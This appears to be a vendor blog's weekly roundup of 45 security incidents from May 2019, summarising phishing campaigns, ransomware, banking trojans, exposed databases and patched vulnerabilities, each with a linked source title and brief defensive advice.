45 Security breaches Worldwide – Week 19, 2019
Be informed about the latest 45 Security breaches Worldwide, identified and reported publicly during Week 19, 2019. Security-related breaches have a severe negative impact on any business, consider a security AUDIT to prevent any similar cases.
- BC Hydro is seeing a lot of spoofing/phishing emails.
- BC Hydro has issued a warning after it received reports of a new twist on an email scam targeting its customers.The fraudulent messages ask customers to click a link and enter their bank information to access a refund, according to the utility. BC Hydro scam targeting customers on an ‘unprecedented’ scale, utility warns
- GPS units can be easily spoofed
- Driving downtown, you glance at your navigation app and see that it thinks that you are at the airport. A bit unsettling, no doubt. Is it possible to guard against GPS attacks?
- For the privacy paranoids
- Google has added a new option to completely delete your location history and activities. Google Adds New Option to ‘Auto-Delete’ Your Location History and Activity Data
- Retefe is a banking Trojan that is on the rise in Switzerland and Germany last month.
- It is hitting both Windows and Mac targets. It has updated tactics, a new loader and infection vector that uses a phony shareware utility called Convert PDF to Word. 2019: The Return of Retefe
- A report on the latest phishing trends shows that social media has seen the biggest growth since last quarter, with a 75% increase.
- Microsoft is still the most phished brand, helped by an easily constructed phony login page for O365, along with copious credential thefts and reused passwords. Phishing is also more prevalent on Mondays and Tuesdays. Phishers’ Favorites: It’s Lonely at the Top: Microsoft Remains the #1 Impersonated Brand in Phishing Attacks
- Here is a technical explanation of how Facebook intentionally circumvented its own privacy controls to share data with its partners and how apps can make tons of cash selling this supposedly private data.
- Along the way, the company took advantage of regulators’ ignorance of its technology to sell your data by ignoring everyone’s sharing settings. “Zuckerberg calling for a new era of true data portability is no different from the meth dealer demanding the keys to the drug locker.” Deceit By Design: Zuck’s Dirty Secret He Doesn’tWant You To Know
- A new malware encyclopedia is now out from CheckPoint devoted just to MacOS exploits.
- You can dig deeper into how the code works, links to signatures, events and samples. This should finally put to rest that Macs are immune from malware. macOS Malware Encyclopedia
- Coinminers are still very much with us, even though one of the major players, Coinhive, was taken down in March.
- Researchers are still seeing remnants of its malware code on tens of thousands of computers, trying to phone home unsuccessfully. Coinhive’s major competitor, CryptoLoot, is still active with 1 million daily requests across the Internet. Cryptojacking in the post-Coinhive era
- More than 50,000 customers of SAP are open to attack, according to researchers.
- The issue is that errors in SAP NetWeaver configuration settings can be used to compromise applications. They are calling this exploit 10kBlaze and more than a dozen SAP products are affected. You’ll want to patch them asap. Protection from a Cyber Exploit With the Power to Burn Financial Statements
- Most Dell Windows PCs are vulnerable to remote code execution attacks, thanks to its SupportAssist application.
- This software is used for remote technical support. A young researcher discovered the issue thanks to ARP and DNS spoofing. Remote Code Execution on most Dell computers and Automated, proactive and predictive …..
- The job listings site Ladders left an unsecured ElasticSearch database which contained details on 13 million resumes and current salaries.
- It was quickly protected after reporters notified the company. Job recruitment site Ladders exposed 13 million user profiles
- Researchers have found a new variant of the Shellbot cryptominer.
- It uses a well-known SSH brute force technique to break into Linux servers with weak passwords to mine cryptocurrency. The team observed that the code was actively being updated with new obfuscation methods. A Threat Stack SOC Analysis: The Continuing Evolution of the Shellbot Cryptomining Malware
- Barracuda researchers have revealed a startling rise in account takeover.
- A recent analysis of account-takeover attacks targeted at Barracuda customers found that 29 percent of organizations had their Office 365 accounts compromised by hackers in March 2019. More than 1.5 million malicious and spam emails were sent from the hacked Office 365 accounts in that one month! Threat Spotlight: Account Takeover
- It appears the “backdoor” to Huawei routers is nothing more than telnet.
- The mistaken reveal got a UK minister sacked this week. We all want to see hard proof of deliberate espionage. This is absolutely not it. Oh dear. Secret Huawei enterprise router snoop ‘backdoor’ was Telnet service, sighs Vodafone
- Implementations of several versions of OpenPGP and S/MIME have vulnerabilities in their email signature verification code that could allow for spoofing of the messages.
- A team of German academic researchers found five different attack methods among 14 different email clients. They label the effort “Johnny You Are Fired” and propose a series of mitigations, most of which have already been implemented by the email vendors. Artifacts for the USENIX publication
- Malware is more frequently designed to detect and evade sandboxes, which are often used by researchers.
- One way to do this is simply to use tools to inspect Registry keys for the preferred language. Malware sandbox detection and evasion
- Beware of the third-party Smart Content Android App Store.
- It contains nothing but Trojans and malware. You should probably stick with Google Play and be safe. From third-party Android store to SMS Trojan
- Hackers used password spraying to steal documents from Citrix’ internal network.
- They had access for several months before being notified by the FBI about the breach in March. The company notified the California Attorney General of the breach earlier this week. Citrix provides update on unauthorized internal network access and Citrix letter to California attorney general
- A major German IT infrastructure provider has been hit by hackers.
- Data from Citycomp’s network was stolen and posted online in an attempt to extort funds. The firm supplies computer equipment to some of the world’s largest companies, including Oracle and Airbus. The data dump is supposedly more than 500 GB and includes data from the German branch offices of Citycomp’s customers. Hackers Steal and Ransom Financial Data Related to Some of the World’s Largest Companies
- Nine men were arrested for stealing millions through phony emails to numerous businesses.
- They used a combination of scams, including a phony Russian oil scheme and digital romance-blackmails. These all happened in July 2016 and the men were arrested in Texas, Florida and New York. Each is charged with one count of conspiring to commit wire fraud. Nine Defendants Arrested In New York, Florida, And Texas For Multimillion-Dollar Wire Fraud Scheme
Protect your WordPress: BEFORE IT’S TOO LATE! You will also protect your customers, your reputation and your online business!
Discover trending and viral stories about Security breaches Worldwide. The remaining Security breaches made news headlines. All these happened just last week.
- At the beginning of the year, the EU announced a massive bug bounty program with nearly US$1M in rewards.
- They quickly were hit with a backlash because of a lack of resources to help open source project maintainers. This post explains some of the other darker issues around bounty programs, and shows how it isn’t just about finding the bugs but having follow-ups and fixes too. EU offers bug bounties on popular open source software and Amid Bug Bounty Hype, Sometimes Security is Left in the Dust
- The Swarm, Ansible and GitLab Jenkins plug-ins have significant bugs that could allow attackers to gain access to the central server.
- All three have been updated recently, thanks to this research. Vulnerability Spotlight: Multiple bugs in several Jenkins plugins
- Magecart card skimming injections labeled MirrorThief have compromised more than 200 on-campus online stores.
- The issue was the e-commerce platform PrismWeb sold by the Nebraska Book Company. They have released an update and users should deploy it immediately. Mirrorthief Group Uses Magecart Skimming Attack to Hit Hundreds of Campus Online Stores in US and Canada
- Yesterday the latest Verizon 2019 Data Breach Investigations Report was released.
- It contains information on more than 2,000 confirmed data breaches seen during 2018, taken from more than 70 different reporting sources and analyzing more than 40,000 separate security incidents. 2019 Data Breach Investigations Report (pdf)
- Hackers were able to steal the equivalent of $45M+ from the Binance cryptocurrency exchange.
- The bitcoins were removed by phishing and malware, and the company pledged it would reimburse the rightful account owners. This blog post announced a temporary suspension of deposits and withdrawals (but not trading), explains what happened and how the exchange is dealing with the theft. Binance Security Breach Update
- The city of Baltimore, Maryland suffered a RobbinHood ransomware attack on May 7 that knocked out the majority of city servers and some government applications.
- Various city services aren’t yet working, according to this report. Hackers demanded the equivalent of an $80,000 payment, and so far officials have refused to pay. This was the second ransom attack on the city: last year its 911 ops center was hit. Baltimore City Hall Computer Network Infected With Ransomware Virus, Officials Say
- A new variant of Dharma ransomware has been found that includes an installation of an ESET software removal tool.
- This distracts users from its background malicious activities. Dharma Ransomware Uses AV Tool to Distract from Malicious Activities
- A massive SMS spamming operation was uncovered, containing data on 80M people.
- It has been responsible for sending millions of texts trying to lure victims into revealing their online credentials. Ironically, they failed to password protect their server, and a researcher posted the details about their operation. Massive SMS Bombing Operation Uncovered In Passwordless Database
- Canada’s 4th largest mobile provider Freedom Mobile had an unprotected ElasticSearch storage bucket containing 5M log entries of customer data.
- Credit cards and CVV numbers were included. Eventually, the company set up a password on the server. Freedom Mobile Data Breach Exposes Canadian Customers’ Full Credit Details
- The account software company Wolters Kluwer has confirmed its servers were taken offline thanks to a malware attack.
- They sell the CCH service and stated that no customer data was compromised. Krebs has more details here. Public Statement – Network and Service Interruptions and Updated this story to include the latest statement from Wolters Kluwer
- The Turla group of Russian hackers has developed a new exploit called LightNeuron.
- It was specifically designed for Microsoft Exchange email servers and works as an MTA. It is delivered via infected PDF and JPG attachments. Turla LightNeuron: One email away from remote code execution
- ISPsystem is a web-based control panel used by numerous hosting providers and their customers.
- Researchers found several bugs that could allow hackers to hijack sessions and take control over a user’s websites. The company fixed the problem and issued a patch with v.5.178.2, and users should upgrade. Vulnerabilities in ISPsystem
- WordPress is releasing a new version today that will include screening for supply-chain attacks, which are on the rise.
- The new version checks for code signatures to ensure plug-in integrity. Users should update to v.5.2 asap. The feature will prevent threat actors from issuing a mass update pushing malicious code onto all installations after taking control of the WordPress infrastructure. WordPress Supply Chain Attacks: An Emerging Threat and WordPress 5.2: Mitigating Supply-Chain Attacks Against 33% of the Internet
- the median number of days to discover an external cyber intrusion dropped from 83 days in 2017 to 55 days in 2018.
- According to a new report from Trustwave. While that is good news, the evidence of some attackers wasn’t found for more than a year. And to make matters worse, the portion of all incoming email that was spam rose from a third of all messages in 2017 to close to 90% last year. 2019 Trustwave Global Security Report (pdf)
- Malware writers are using various cloud services to hide their command infrastructure and code.
- This post summarizes two of these methods nicely. For example, tech support scams are being hosted on IaaS object stores, using arbitrary host names to make them harder to spot. And G Docs are being used to create phishing templates and hide the malicious URLs behind them. This means defenders will have to up their game on content filtering and use better analysis to figure these ploys out. Old Scams Getting New Life in the Cloud
- Israeli air strike on Gazan cyber offices.
- Many infosec reporters posted items yesterday and claimed this was a significant event in bridging cyber and kinetic warfare. This law professor says the action wasn’t all that big a deal, and certainly not historic. Crossing a Cyber Rubicon? Overreactions to the IDF’s Strike on the Hamas Cyber Facility
- Chrissy Morgan has posted the recording of an hour-long talk on responsible disclosures she recently gave at Le Tour Du Hack.
- She discusses the context of some significant disclosures and what researchers did correctly and incorrectly. Le Tour Du Hack 2019: The Good, The Bad And The Ugly Of Responsible Disclosure – Chrissy Morgan
- The malware stealers Hawkeye and FormBook have also been upgraded.
- They both have added new and improved obfuscation methods. Sentinel One has the skinny on FormBook here; MyOnline Security has the deets on Hawkeye to look for running processes or VMs. FORMBOOK | YET ANOTHER STEALER MALWARE and Hawkeye keylogger using fileless delivery system via Amazon AWS
- Are you still thinking BYOD is secure enough?
- Maybe you need to review why you need to better understand what is the zero-trust model and how to implement it with less risk. The importance of zero-trust in a BYOD environment
- GPS apps to locate equipment and employees
- The U.S. Global Positioning System, part of a network of global navigation satellite systems (GNSS), is vulnerable to attacks that could disrupt many industries. Here’s how it works and what you can do to mitigate its risk. What is GPS spoofing? And how you can defend against it
- Chinese state-sponsored hackers acquired Eternal Synergy and Double Pulsar hacking tools from the NSA.
- This was done in 2016, a year before the Shadow Brokers first leaked these tools across the Internet. The hackers used these tools to invade numerous business and government networks around the world. It isn’t known how they obtained these tools. Buckeye: Espionage Outfit Used Equation Group Tools Prior to Shadow Brokers Leak
- Ransomware is now so common that it is even a subject of a segment on this week’s 60 Minutes.
- But a new ploy is leveraging Git-based services that replace various source code repositories with a ransom note. Poor password hygiene is the cause. The files aren’t deleted– just their headers– and can be restored. Almost 400 projects have been affected so far. A hacker is wiping Git repositories and asking for a ransom
- Attackers are using shell_exec function to kick off Cron jobs to add malware backdoors.
- What is intriguing about this attack is that the hackers are storing their commands in a DNS TXT record. Cronjob Backdoors
- The banking Trojan QakBot is back in the news.
- It has a better way to persist after reboots that make detection harder. Qakbot levels up with new obfuscation techniques
- Late last week, Firefox prevented add-ons from running inadvertently.
- The issue had to do with how the certificate signing was handled, and an update v.66.0.4 should fix the problem, provided you have set your Studies option to enable updates. Firefox v.65 patched another security bug called write after free last month. CVE-2018-18500: write-after-free vulnerability in Firefox, Analysis and Exploitation
Get Healthy, Stay Healthy: A healthier online business starts today and it begins with you!